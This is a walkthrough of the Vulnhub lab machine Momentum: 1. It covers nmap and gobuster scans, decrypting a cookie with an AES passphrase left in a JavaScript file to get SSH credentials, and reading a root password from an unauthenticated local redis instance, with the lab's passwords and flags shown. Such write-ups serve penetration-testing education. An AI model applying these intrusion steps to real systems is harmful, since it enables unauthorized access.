Momentum Vulnhub Walkthrough
In this write-up, we will be solving Momentum: 1 from Vulnhub. This machine is rated easy and created by @AL1ENUM. It takes us through exploiting a JS function to retrieve the SSH credentials and then exploiting the redis-cli to get the root password.
Initial Enumeration and User Shell
I started the initial enumeration by running a port scan using nmap to look for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]=
└─$ nmap -sC -sV -oN nmap/initial 192.168.29.186=
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 10:28 IST=
Nmap scan report for 192.168.29.186=
Host is up (0.015s latency).=
Not shown: 998 closed ports=
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
| 256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_ 256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum | Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
We have only two ports opened, so let's start the enumeration by visiting port 80 in our web browser.
We do not have anything interesting here, so next I performed a gobuster scan to search for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ gobuster dir -u http://192.168.29.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.29.186
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/17 10:31:26 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.29.186/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.29.186/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.29.186/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.29.186/js/]
/server-status (Status: 403) [Size: 279]
===============================================================
2021/06/17 10:35:13 Finished
===============================================================
There are some common source directories. It's always good to read the source code to find vulnerabilities. I visited the /js
directory which has a file named main.js
which contains some useful information.
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
Here, we have this named opus-details.php
with a parameter id
. I visited the page and checked for LFI and RCE but none of them worked.
But when I checked the document cookies, we got a cookie set after visiting opus-details.php
.
This cookie seems like some sort of encrypted string. Okay so now we have a Crypto function, a secret passphrase and an encrypted string. So let's head over to jsfiddle.net and try to decrypt it.
I imported the CryptoJS Library in the HTML:
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
</head>
And then decrypted the hash using the following code in JS:
var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
After running the code we get the output - auxerre-alienum##
.
This is the login password for SSH, we can login via SSH using the username auxerre
and password auxerre-alienum##
.
After logging in, we can read our first flag present in the home directory of user auxerre.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ ssh auxerre@192.168.29.186
auxerre@192.168.29.186's password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ ls
user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
Root Shell
I tried running some linux enumeration scripts but did not find anything interesting, I also checked for SUIDs but did not find anything useful.
Next, I looked for open ports using the ss
command and found a port listening internally.
auxerre@Momentum:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::1]:6379 [::]:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Port 6379 is used by redis-cli. We can connect to it using the redis-cli
command.
auxerre@Momentum:~$ redis-cli
127.0.0.1:6379> KEYS *
1) "rootpass"
We have a key named rootpass
. When we open it, we get the login password for user root
.
127.0.0.1:6379> GET rootpass
"m0mentum-al1enum##"
Now we can use su
command to switch to user root
and read our final flag.
auxerre@Momentum:~$ su root
Password:
root@Momentum:/home/auxerre# cd
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!